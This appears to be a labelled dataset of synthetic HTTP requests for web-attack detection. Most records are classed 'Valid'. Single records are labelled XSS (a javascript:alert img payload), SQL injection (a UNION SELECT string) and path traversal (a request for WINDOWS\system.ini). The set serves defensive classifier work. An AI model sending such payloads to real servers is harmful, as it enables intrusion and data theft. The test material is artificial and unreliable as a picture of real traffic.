Max-Forwards: 3657
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://eoSaio.ch/paao9/eapN/amw5eew/aeif8h.sh
Authorization: Digest algorithm=MD5
Range: 133-,9513-615,126337-04
Referer: /srfsffTi/ocasntS/ndaupsk.swf
TE: chunked;q=0.0,deflate;q=0.1
Trailer: If-Match
User-Agent: Mozilla/4.1 (compatible; MSIE 8.8; Unix; tnbagg; houuFiso)
UA-CPU: x86
UA-Disp: 0411,934,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8272x2964
Via: FTP/7.2 www.loLfe.js, FTP/9.5 179.180.44.33
Transfer-Encoding: deflate
Upgrade: e7El/2.6, ld3p/0.0, ued/6.5
Warning: 865 www.btsmfeds.js "eterOr" 
X-Forwarded-For: 180.18.29.73
X-Serial-Number: 39984
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15432
Start - Id: 23509
class: Valid
GET /Dform.asp?nbykCljm=idYnMR&._O_qAPs=sB5UBy&.yAMEOVZ=b%3DchildAeem6letn&0wXnI=rlsfineokti4iahht&lbeiae2tdr8ensa=6erinaaa&iframeqQl=32513482&fnoadwNwi7Nftew=jatn8qtsn4sF&egYsr=o7dieadmintLi&0t=cmdnsnv&eisee=4e31iju-rn&tFmAk=ftJ-&ost=8602 HTTP/1.0
Host: www.bcu2tltdwc.it
Connection: close
Accept: */*
Accept-Charset: x-mac-cyrillic;q=0.7, iso-8859-8-i;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 29.220.169.125
Cookie: rs1yZu8fdETobject=e;lhr=sb0rorh8;dvpDJVHyAmG=i-noarU;irghs9=hi6ni7(;tlal=8005
Cookie2: $Version="154"
Date: Wed, 22 Aug 07 08:27:40 GMT
ETag: "rGq1BnAln3-I1RbT"
Expect: 100-continue
From: ltnesme@hsentase.it
If-Modified-Since: Sat, 19 Nov 05 05:29:43 UTC
If-Unmodified-Since: Mon, 23 May 05 24:07:58 UTC
If-Match: *
If-None-Match: "f91eWlmGkrcd6os1uHQY"
If-Range: "90EI5iTxwUh_Lpu-GQvd"
Max-Forwards: 1839
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic VHJzRDZtZTpzN2xldGl3cg==
Authorization: NTLM d2ljU2UybHNpZWFzaXNlVDJIcmVtaWV1eGh0b3BldDNtY24waW12a25h
Range: 90-,49-617
Referer: /mucopS6w/ehEetn/pyynra/r0l5bkwm.pdf
TE: trailers,trailers,deflate
Trailer: Trailer
User-Agent: Mozilla/5.0 (X11; U; Solaris 7.1; sa-Lv; rv:8.3.1) Gecko/55787299
UA-CPU: x86
UA-Disp: 987,566,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4426x0282
Via: HTTP/9.5 167.65.8.208:72
Transfer-Encoding: zEnrr
Upgrade: Odqe/8.0, Phrs/0.8, i83hqn/9.8, 6d1a/9.7, joi/4.4
Warning: 316 www.deemx.htm:8305 "btsydnansow" 
X-Forwarded-For: 238.108.237.191
X-Serial-Number: 24687
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23509
Start - Id: 29818
class: Valid
GET /3AlG044SyQ/nK/linkYfFk/a@Z-To/Asd25sqocur4eldi/tmpvQHB.html?o8Uhz69hjeo=369997&eu0zodMe=hunhzmemmedrirH&c6aTfaavglG=trbb4pmcD&raeuodSarn05anb=4V1WkFvI&nbsEks2aE8nomi=9as+&ocribmhhps3i=ehtarnedaoSic0 HTTP/1.1
Host: www.ocndm1ciC.be
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-japanese;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 173.222.100.215
Cookie: ohbwbcea2s6eN=847
Cookie2: $Version="7"
Date: Wed, 03 Nov 04 17:00:29 GMT
ETag: W/"qOja.8bmoYJ0.nDl"
Expect: 100-continue
From: 4hgys@hnenh.de
If-Modified-Since: Tue, 03 Mar 09 11:04:45 UTC
If-Unmodified-Since: Thu, 07 Jun 07 14:32:05 CET
If-Match: *
If-None-Match: "voFXgm-5GCXgMhZM_EQ"
If-Range: *
Max-Forwards: 1095
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="iebwoe"
Authorization: Digest opaque="eioh"
Range: -93,-49652,-982
Referer: /itvLee/uOvaurr/Mfmle/ator.pl
TE: chunked;q=0.4
Trailer: Accept-Encoding
User-Agent: aird/8.1
UA-CPU: 68000
UA-Disp: 793,154,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 238x9907
Via: 5.7 www.pischps.gif:7
Transfer-Encoding: gzip
Upgrade: eao/6.7, qpa/6.7
Warning: 757 171.183.186.152:6 "lkOups" 
X-Forwarded-For: 22.79.136.228
X-Serial-Number: 32706880083350611
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29818
Start - Id: 590
class: Valid
GET /pform_oN0xNsZxLy-G/z6YmeKDp/Ea60hi84afnoik8sh5/ypgrtezwgfgeINaa/esshnelooiiLhs9hYi/2GD/rqeJ.htm?T5lnn3agRanyamj=hKZnvv%4022Q.&EYNFqidmV.=eoaaQbinshs&Nq8ojimgf=or7r&tnihdo0f=ytxpocbh6&yIba2EhhlrFube=15&swrhnsdS=s&ow=lcu0kOTeoimTad&qxdotkSl=ewwMg&mtlttl=u%29sn&e1rEI2b=e2&TdMdn6aRdcE=eonohoeto1em&2ECr7Fftp=+uiovy&SrSS=puv&focohcforvd=1 HTTP/1.1
Host: www.t4iiieozyc.it:4433
Connection: close
Accept: image/*, application/rtf;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: rgsN-uaj43t, e5TswY-anntg;q=0.6
Cache-Control: yeaieerD='seld5'
Client-ip: 36.96.211.242
Cookie: eebinnr=9tnewdssezrenfesSe;leJsoHaos=stredeolm
Cookie2: $Version="482"
Date: Thu, 11 Jan 07 15:32:24 UTC
ETag: "VyiZ8hXG6jlDRK.MpG_"
Expect: yt8oe=aaEsH;H7se=RtsaEn
From: i7wh@s1dUih1sA.it
If-Modified-Since: Mon, 19 Apr 04 17:23:45 GMT
If-Unmodified-Since: Tue, 22 Mar 05 14:22:31 UTC
If-Match: "7P61XGItErMFdTd3Kv"
If-None-Match: *
If-Range: *
Max-Forwards: 483
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM aWVlZW9kdHVhbUFnaTdtZGVzZU5yZ2dRMW51bHdhV2Nlbm1yYw==
Authorization: 3trot unnhgOE=erlyc
Range: 00-
Referer: http://www.htoll.gov/m2uev.pdf
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: imt8/0.1
UA-CPU: Sparc
UA-Disp: 8563,166,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 412x961
Via: sUtit/6.0 147.196.248.44:27045, FTP/8.4 www.fnan.jpeg
Transfer-Encoding: ee56; rtso=rtja4sy
Upgrade: thc/6.8
Warning: 295 www.ensg.png "bmssbEen" 
X-Forwarded-For: 119.10.246.153
X-Serial-Number: 812808464
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 590
Start - Id: 18170
class: Valid
GET /pavtoriRmwdeiromlile/eAFZvF/5KtiBT3/s2iGnOJ7x.mspx?g8oooetopesDt=uitt0paD3lnnienqn&Hb3lW8@=hln3isirwAlddA4i&ssqaedmo8dsTna=084970961&idiei=rzi HTTP/1.1
Host: www.gzsosr3.uk:80
Connection: tTtwuY
Accept: audio/basic
Accept-Charset: iso-8859-7;q=0.8, cp-950;q=0.8, x-mac-korean
Accept-Encoding: compress, gzip;q=0.2, deflate, gzip;q=0.9
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 83.151.86.241
Cookie: dRBnd0H=0974466;lpDimnnlEEhe=itp
Cookie2: $Version="508"
Date: Tue, 05 Apr 05 16:39:23 GMT
ETag: "Qw9p9-igeRuCzzA"
Expect: 100-continue
From: udml@oe5nd.uk
If-Modified-Since: Mon, 16 Apr 07 07:59:30 UTC
If-Unmodified-Since: Sun, 07 Mar 10 17:01:41 CET
If-Match: "g.hOfGIIWeYu4rknWb"
If-None-Match: "UJ@6r_v-sNhY1EV"
If-Range: Mon, 22 Dec 08 17:53:50 GMT
Max-Forwards: 122
MIME-Version: 1.0
Pragma: eoi='tnwet'
Proxy-Authorization: NTLM bzJuTGVlaVducmxpbXNhc21OdGU1bEZsaWF0dGVlam9ydw==
Authorization: Digest username="dtr2cTi"
Range: 6439-,6-42914,-964
Referer: http://www.nasrsl.com/nHEe/Raosd2k7/pIro5r/oehdpru/odooe.asp
TE: deflate,gzip;q=0.6
Trailer: Pragma
User-Agent: Suwdu (s.7sppg.4)
UA-CPU: MIPS
UA-Disp: 904,033,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3922x0648
Via: 8RitI/6.5 57.170.54.163, 3.9 www.Nirhe.html
Transfer-Encoding: neehae; no0nen=ATiwlds
Upgrade: receba/6.4, n0ete/3.0, 8dtoRs/5.6, voa/4.8
Warning: 282 www.mtd6lng.tiff "rqniee0sohncxoe" 
X-Forwarded-For: 53.225.75.3
X-Serial-Number: 45102302554958015
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18170
Start - Id: 25358
class: Valid
GET /m..pl?ics7uls8c=2380022&7ote=ndr1&tn6=i5mVVWt6u&DWrj5BzRI=r9UiNbnyIy%40&sSeecps=8434&cetteeaiwA8a3bs=bMJp4f&sgabtrJleie=wre%3D%3C9etc&ootmwaoaseremr=dee&uhjttusvqrone=qe2rais&iemoey2m5aeko=38391021&eupe=DPdeleteh%7E&s1mesrleeC=aW6a4Zb.DXC-&lgAupdateNlog1UKVX=079956719 HTTP/1.0
Host: www.atnp.fr:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=472
Client-ip: 116.248.127.206
Cookie: esHi=eeutqaoib5ma;uje=8066;F2Di5n=o3%/e>sla;uiihssh8nehrent=iya
Cookie2: $Version="1"
Date: Thu, 24 Sep 09 07:54:22 UTC
ETag: W/"OJrE9kf9XSX9hQXD"
Expect: 100-continue
From: 5tiby@ird1trmU.net
If-Modified-Since: Wed, 08 Mar 06 17:44:35 CET
If-Unmodified-Since: Mon, 29 Dec 08 07:45:10 UTC
If-Match: *
If-None-Match: *
If-Range: "2SEy-dBl2x3xICyzZ_2"
Max-Forwards: 1451
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Basic b2FhaHVpZzpnMG5pdGhocg==
Authorization: mptt usyihe=Tgnd6n
Range: 4947-
Referer: http://www.u3bph.net/teReg78/7bccyd/fnohoPrt/tfitemlt.wav
TE: deflate;q=0.7,trailers,deflate
Trailer: From
User-Agent: Mozilla/5.1 (X11; U; Open BSD i386 4.3; dR-0e; rv:9.9.3) Gecko/15046824
UA-CPU: 68000
UA-Disp: 761,7667,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 894x439
Via: FTP/7.2 95.90.176.164, HTTP/6.7 102.73.8.125, 6.5 247.93.209.205
Transfer-Encoding: identity
Upgrade: 5itIE/7.2, iAlg/7.5
Warning: 127 197.55.244.77 "fosrtaeywgeT" 
X-Forwarded-For: 191.180.248.237
X-Serial-Number: 29493838100482691776
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25358
Start - Id: 48102
class: XSS
GET /t1hoi/spnOO.msf?ueoe=76&TWp1UYBT.e9=%3Cimg++++src+%3D+%22javascript%3A++%5Balert%28%27tfet3aiN9%27%29%3B%5D%22++%3E&ph9Ots_mS=eelf5%28o+rr&IDRLHVxkhomemT=581&iannsurr=eDK3F&rrhaonandatmml1=cb2QfrZ%40I&Fcta0eO0eenbeea=15880857&ltdeehqT=0&KbqlkhisRt=eetceorhodtOain1s&tMdchild2qBNb=43&zdrssspiibires=035564&irckassB8=8Awtt HTTP/1.1
Host: 108.77.201.108
Connection: keep-alive
Accept: application/rtf;q=0.9, audio/*
Accept-Charset: koi8-r, euc-jp;q=0.0
Accept-Encoding: identity
Accept-Language: oerSt-a, Zn-oisthE, racaeg-lb
Cache-Control: max-stale=7
Client-ip: 44.194.102.2
Cookie: UfEy=lr'6cqzumirsUAa
Cookie2: $Version="6"
Date: Fri, 08 Oct 04 19:52:00 UTC
ETag: "9EHYczVAM469GwcD"
Expect: 100-continue
From: aIafz@wvamBrQ.uk
If-Modified-Since: Tue, 22 Aug 06 21:30:24 CET
If-Unmodified-Since: Sun, 07 May 06 03:14:47 GMT
If-Match: "tJX6Lsh4xpqwcWn"
If-None-Match: *
If-Range: Mon, 03 Mar 08 21:30:01 GMT
Max-Forwards: 8519
MIME-Version: 8.9
Pragma: mooeci8=awue
Proxy-Authorization: nii4 fncehnss=cd2a
Authorization: ny9cr sjeOhe=rf9a
Range: -179295,540225-63
Referer: http://www.fifeaac.st/ostr5g/iottm.ace
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.6 (X11; U; Open BSD i386 7.1; to-aX; rv:4.8.5) Gecko/89898196
UA-CPU: StrongARM
UA-Disp: 367,260,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6001x2247
Via: FTP/1.4 www.efor.jpeg:559
Transfer-Encoding: deflate
Upgrade: k6wua/1.5, metwv/8.5, seYsb/7.3, xm2ufg/8.4
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 69.186.228.89
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48102
Start - Id: 17642
class: Valid
GET /lrOra3E9pe4dIvFi/nliute8ii4xaruk89t/41yJpGa-DUyotF9G/oHMBvm/a_s0zzBNmQ2nfD/elEm5/6LBwS8oYeaJydG/i8Ej1NFJtui6/0YAsT4USk2-sS/a1caTUzeadssm6.mspx?HTighxxaatemf=157111443&ioai=dolautoexecscriptihmmn HTTP/1.0
Host: 114.100.90.19
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 149.12.215.3
Cookie: esnepsei00d2a=o=oej;rcphOb7aenuhr0D=loehtpassashrqst>t;r7tniAgosy9d=pAa3oEbe;Cthrjhxoitdx=tU0FG
Cookie2: $Version="1"
Date: Thu, 10 Nov 05 04:00:54 CET
ETag: "s-gNiks6Lw78EgxIbZn"
Expect: 100-continue
From: spzl@sWeElsewt.de
If-Modified-Since: Mon, 21 Mar 05 08:20:23 CET
If-Unmodified-Since: Sun, 18 Nov 07 22:14:10 GMT
If-Match: *
If-None-Match: "FonI1BHBg1pvMi-p"
If-Range: Sun, 25 Nov 07 03:20:42 GMT
Max-Forwards: 5
MIME-Version: 8.1
Pragma: iw='tl'
Proxy-Authorization: NTLM YXBsZ2N0Z0RuYjFzbnRvUmd0YXJsbnQ4dHN0cnNodHVXZXQwZWVpZWV1aWQ=
Authorization: NTLM cmxkYW1yb2VzUm5lY3lzZWg5aGI2ZWhhOHRyZXJyZXll
Range: 513554-,580948-54482,762083-
Referer: /0adean/wqcsca/rraeA/hoauesn/ddotAc.asp
TE: trailers,trailers,gzip;q=0.4
Trailer: Accept-Encoding
User-Agent: Mozilla/6.2 (Machintosh; U; PPC 9.0; ea-tD; rv:4.6.1) Gecko/46692479
UA-CPU: Sparc
UA-Disp: 004,3622,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 519x8664
Via: 8.9 253.57.72.181, 5.8 www.t2iisofm.jpeg, 3.9 42.62.13.246:445
Transfer-Encoding: identity
Upgrade: tlNe/2.8, mgiaa/3.5
Warning: 768 www.lonce.jpg:6617 "rDn7td" "Mon, 09 Feb 09 19:00:46 GMT"
X-Forwarded-For: 9.161.93.196
X-Serial-Number: 6572400
----: --------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 17642
Start - Id: 12241
class: Valid
GET /2eprsihota/xEsaHbx0/epg/inJyRQX8K4E/nZFW/ftpOacceptI1O3Xyn1.php3? HTTP/1.1
Host: www.nsassso.cz
Connection: close
Accept: image/gif, image/jpeg, application/zip;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.8
Accept-Language: ad4-Ct;q=0.2, hf-l1la;q=0.7, Iso-lssnpbi
Cache-Control: no-transform
Client-ip: 218.85.114.86
Cookie: mNcou=6801948;ttTfnstzse10s=976;ehe= d:i;eea=hpeyeiIrytr8pf;;atdwhehtSnlwLcr=iiad9e;eli8jxeomne=715
Cookie2: $Version="3"
Date: Mon, 17 Nov 08 12:42:46 CET
ETag: W/"xj9bPbOfBXF0mYAiX9aB"
Expect: twshmm8
From: tRmfo@Moomaa.cz
If-Modified-Since: Tue, 29 Aug 06 17:05:51 CET
If-Unmodified-Since: Fri, 10 Feb 06 13:49:12 CET
If-Match: *
If-None-Match: "0HSRgR-7bUhHG.-g7z"
If-Range: *
Max-Forwards: 735
MIME-Version: 1.6
Pragma: rtql='beht'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest nonce
Range: 63024-,99-
Referer: /fWxemrTa.conf
TE: gzip;q=0.9
Trailer: Expect
User-Agent: Mozilla/2.7 (compatible; MSIE 4.0; Mac OS X; eupvniwsto; dD2hpcel)
UA-CPU: Sparc
UA-Disp: 2190,4880,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 7901x792
Via: HTTP/4.0 www.ouaea.jpeg
Transfer-Encoding: deflate
Upgrade: xnhun/4.7, foajfe/4.9, tiTnoe/9.3, sHsmu/7.7
Warning: 176 125.171.28.119 "rAswf" "Thu, 16 Oct 08 01:05:52 GMT"
X-Forwarded-For: 60.209.14.143
X-Serial-Number: 8899123917889
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12241
Start - Id: 32079
class: Valid
GET /tgsACql/Hv5@cmdYxf/6GQwpPtQAQBT/iqusbsiureeEc2shmno/rWLqg/7hiihtplobi2t.mdb?optcz_=8&rameur=7dwrawEire&tewo=78216405&mtn=s&ayrasyuyoaedC=i40&Nidelete5KFWJ8M3=76129&mn6y=ifoelaDiS4lmiu&cybiphu=225&gTSroiNtiuicvRi=wq&Nsrl=e+bd+1ovar1c&MQ0ex9O=eu HTTP/1.0
Host: 155.228.20.21
Connection: keep-alive
Accept: */*
Accept-Charset: ks_c_5601-1987, iso-10646-ucs-2, iso-2022-jp;q=0.8
Accept-Encoding: *
Accept-Language: har-Out2x;q=0.6, tsi6e-moa9, yrep-c;q=0.5
Cache-Control: no-cache
Client-ip: 201.159.115.95
Cookie: no6pts=6;tsus9o1ze=b3hc;idHIrtnAxab=8673477;n8ryhdsnnalah=oegn1asnso2null/jn;letop=xp_
Cookie2: $Version="35"
Date: Sat, 22 Aug 09 15:54:27 CET
ETag: W/"Suy7TCb_Cjful6@zdC"
Expect: 100-continue
From: eaciy@sieacL.uk
If-Modified-Since: Tue, 02 Nov 04 12:49:32 UTC
If-Unmodified-Since: Sun, 13 Nov 05 24:45:10 UTC
If-Match: "gySLybLxgNC@nocT4"
If-None-Match: *
If-Range: "Dd.N6Jd0nLIqoq0A19"
Max-Forwards: 41
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic b25lMnVpdDp2MHRoZGhjZQ==
Authorization: Basic Y2lpNjplZHRqd2RlNA==
Range: 409-001,9959-4327,17574-972
Referer: /mtihj/qnayhes/leet4oaa/s82o2Of/mwPotzer.cgi
TE: deflate;q=0.6,trailers,deflate
Trailer: From
User-Agent: Mozilla/2.4 (compatible; MSIE 0.4; SunOS sun4u; tebtph; mtotg; inRn)
UA-CPU: MIPS
UA-Disp: 929,743,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8495x114
Via: 3.7 136.199.29.108, 5.6 www.tyue.shtml:44
Transfer-Encoding: compress
Upgrade: ehn/6.4, 9i5pap/5.7, Nsq/6.8, tuay3o/2.7, esA/8.9
Warning: 072 92.219.210.208 "TT4h" 
X-Forwarded-For: 82.254.186.80
X-Serial-Number: 34758865476448808371
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32079
Start - Id: 42525
class: SqlInjection
GET /aiZIsfwuM/dVafzxcb-3X/i27uwwmSaqoSnqMCTh/tse/XPTbh/rin9iy1kmnhhaqt/ca7KQV3nKg/sDJ99fwD5@f/gwbV9Oeareoa5/ETl.js?tYohhirErtBa=uiahela&cee=%27++%29++++UNION+++++ALL+SELECT+++++pem3qiD++%2C++++ot4x++%2C+sIrn++++FROM++++fregf++WHERE+++saotteze++NOT++IN+++%28+%27Yie1n%27+++%29+AND++Lzdnm+++++NOT++++IN+%28++%27aEltTf%27+++%29++AND+%27%27+%3D++%27&ayio=nhLZeoweentoh&ottewieroetleA=eisBnt%40T8hs&6yseaNcsrsakeii=xfd+gael&letRsm=78oit&PSM@rn=AtmzItrh&rnysa=bgYRPqB1OF HTTP/1.0
Host: www.sudti.fr
Connection: close
Accept: application/*, audio/x-wav
Accept-Charset: x-mac-japanese;q=0.0, iso-8859-4;q=0.2, x-mac-korean, iso-8859-2;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-transform
Client-ip: 193.221.217.71
Cookie: nhtstaiEtrsalai=sWDx;rylepeena0wt=2034;Ghortbs=e2R
Cookie2: $Version="62"
Date: Tue, 12 Aug 08 18:42:21 GMT
ETag: W/"bdccCy6uK1YsnZ3Ajlk0"
Expect: 100-continue
From: lwelhoow@zyxm39yja.net
If-Modified-Since: Sat, 06 Jun 09 02:07:16 UTC
If-Unmodified-Since: Tue, 12 Aug 08 12:08:03 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 69
MIME-Version: 4.3
Pragma: 5b=lEen
Proxy-Authorization: NTLM NXRXZGh0ZW81bXNzbm1nYXhudm1UZGR0aWFhZmVmcGV0c2FuZWVLZXJlcnM=
Authorization: Basic Y1h3aDppZHBiemhSOQ==
Range: -1881,09751-
Referer: http://www.ktvop.uk/ete7tnst/petrisEl/9feo/mxlaete/ajubasoi.cfm
TE: trailers
Trailer: Via
User-Agent: caatHOskH (oOx1hS6DYu; oN36azMAQ; swSRueB)
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: 7.6 250.255.87.61
Transfer-Encoding: deflate
Upgrade: est/3.4, YhOty/4.0, cy16/8.0, cdtno/6.6
Warning: 039 www.rscr.js "tEodeseiset5e5eLbAid" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 49861
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42525
Start - Id: 6683
class: Valid
PUT /eN0jPALt5In7/a72aep9ewslu0eo/esfcn5Orxa/r5VZTOWVM/ah/qkoptVMgN6Xr9/iEZA0FJSrn4IKPZZczS/h@jJk5ecw/mzPER_zAjmb6vUdJ.gif? HTTP/1.0
Content-Length: 72
Content-Language: et1riio
Content-Encoding: gzip
Content-Location: http://www.Tihy.com/teEin/lsOsf/glsnuoy/cdspas.shtml
Content-MD5: N2hOdWlueWlyZ3JlYXNuaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Jun 07 23:24:58 UTC
Last-Modified: Tue, 04 Aug 09 22:59:24 CET
Host: 130.228.190.45
Connection: iluyo
Accept: video/mpeg
Accept-Charset: x-mac-chinesetrad, gb2312, iso-8859-8-i, koi8-r, x-mac-japanese;q=0.6
Accept-Encoding: compress;q=0.3
Accept-Language: *;q=0.8
Cache-Control: max-age=7
Client-ip: 177.176.36.93
Cookie: tsirsheadm=meL3u@;uxr0=nPO
Cookie2: $Version="165"
Date: Sun, 29 Oct 06 17:29:40 GMT
ETag: W/"hP64pnhEM96LTvD"
Expect: otntth=tlnunhit
From: R5anodt@eiRwb.com
If-Modified-Since: Mon, 04 Dec 06 20:23:34 GMT
If-Unmodified-Since: Sun, 20 Apr 08 02:39:31 UTC
If-Match: "20zeabnk5OL3nWet@"
If-None-Match: "KV2gbtRqDdiq4jLw"
If-Range: *
Max-Forwards: 685
MIME-Version: 9.9
Pragma: bwtyh='nos'
Proxy-Authorization: Basic dW51dGVlOmFuaHJ5
Authorization: Basic aWhtbjpzbHBmb2E=
Range: -70
Referer: http://astx.gov/quInhoqa/itoec40/eier/4yiE.tar.gz
TE: trailers,trailers,deflate;q=0.2
Trailer: Accept-Language
User-Agent: armmng/3.7.8.5
UA-CPU: Sparc
UA-Disp: 8391,040,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 075x397
Via: FTP/8.0 116.91.112.159
Transfer-Encoding: compress
Upgrade: tuerio/7.1, 9oaf/9.3
Warning: 490 164.192.138.202 "mmabac8fuum" 
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 688311326706532
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oe9Vcsyehaa=93695354&slrfkfliLnnehs=eeiIaor&trl=linoden3&cenMskthya0=uip

End - Id: 6683
Start - Id: 45750
class: PathTransversal
GET /-echou/rbz/NOAFAa/ai/edOr11xmewG1PEkqih/rzely0s5iarnahrra.cfm?6nwsaee1ons=54515719&hatnq6shta=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&T2CeBzY=9atepi HTTP/1.0
Host: www.lsseo.cz
Connection: lrz7ic
Accept: */*
Accept-Charset: utf-8, x-mac-arabic;q=0.9, windows-1255;q=0.0, iso-8859-6
Accept-Encoding: *;q=0.1
Accept-Language: h-eo5teeGy
Cache-Control: max-stale=4
Client-ip: 100.141.159.183
Cookie: tfWrecg=59;nROtxwrsmsqae=tdL;oywl=Ota;dew=die+
Cookie2: $Version="51"
Date: Sat, 21 Feb 09 14:36:49 CET
ETag: W/"XOfNqF66G.unu7sQ.q1p"
Expect: 100-continue
From: eyebc4et@nriRuu.de
If-Modified-Since: Thu, 12 Jan 06 10:46:25 CET
If-Unmodified-Since: Sat, 14 Nov 09 08:05:22 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 19 Dec 06 15:46:04 CET
Max-Forwards: 5868
MIME-Version: 7.5
Pragma: s=lnv
Proxy-Authorization: Digest uri=/beS0.doc
Authorization: Digest response="094fe2ECEd1ec8875845BBFbA6Aae73d"
Range: -500252,934-3694
Referer: /ry5f1ear.html
TE: chunked,gzip;q=0.8,trailers
Trailer: Range
User-Agent: Mozilla/2.1 (compatible; MSIE 7.4; SunOS sun4u; gnEahke; goudm)
UA-CPU: StrongARM
UA-Disp: 0244,7553,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 337x559
Via: saehs/0.0 www.fcaW2ptt.shtml:909
Transfer-Encoding: 3Epmo
Upgrade: lje/1.7, sts73/6.3, 4d9i/5.5, t3nzwt/8.9, san8/9.0
Warning: 138 195.65.50.48 "amRyeeev4t" 
X-Forwarded-For: 187.241.210.252
X-Serial-Number: 82558
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45750
Start - Id: 30314
class: Valid
GET /ere/rT4daO/5jh6amceoel/abt@IX3@HP-QtPW/binjh6atneziea/lq9peeh5iqtcNkxusacu/Uzlb.nsf?annkslteittoex=e73zrtrecreTMbtz&ym81je=dnc+slsenxi&eai281et25ren=htngokgaoOtye&CemlvpIvmltrtt=302137376&y0ac=d%29&a0=i40Qi4-13&uXBZkojQQs=8 HTTP/1.0
Host: 145.109.106.5:6968
Connection: keep-alive
Accept: video/*
Accept-Charset: iso-8859-8, x-mac-greek, windows-1252;q=0.8, x-mac-roman
Accept-Encoding: *;q=0.7
Accept-Language: F-rounTa, rsiet-cposrep
Cache-Control: min-fresh=28
Client-ip: 81.112.14.22
Cookie: wlviay2ussdw=tmppn;eet0ertoeno=xOadEednssA;cl_EXustylein=g-w
Cookie2: $Version="337"
Date: Fri, 04 May 07 06:27:42 GMT
ETag: W/"xliPt_ly5_0Z-ER.-rRb"
Expect: s6y6sbh=lOeoDn;oetxro
From: ujoeseZ@ns5idhma.net
If-Modified-Since: Thu, 22 Apr 10 05:19:45 UTC
If-Unmodified-Since: Tue, 06 Jan 04 01:41:04 CET
If-Match: "6A0.Xpfyvjc4cTb2"
If-None-Match: "P9x1HitwhdWFmep"
If-Range: "pwxBetCzKqldErSr"
Max-Forwards: 6
MIME-Version: 2.6
Pragma: jgan='rtnlv0o'
Proxy-Authorization: Digest algorithm=idsosvo
Authorization: Basic cnRjcjpvYm5kQXRUZA==
Range: 54-167889
Referer: /hFoth/67fo4i/tiIb/prt4tan/slrTioen.pl
TE: trailers,gzip;q=0.8
Trailer: Trailer
User-Agent: YthT8aoas
UA-CPU: 68000
UA-Disp: 9919,2865,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3971x442
Via: xkd/2.8 195.189.211.95, FTP/2.7 201.213.227.255:45600, 5.4 www.ioarsimr.shtml
Transfer-Encoding: identity
Upgrade: hztley/9.7, peaeM/3.4, iwtar/8.7, 1Tzzin/0.9, roh/9.3
Warning: 088 www.endReiE.gif "eyoier6d" "Mon, 17 May 04 02:23:56 GMT"
X-Forwarded-For: 209.241.65.202
X-Serial-Number: 60742
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

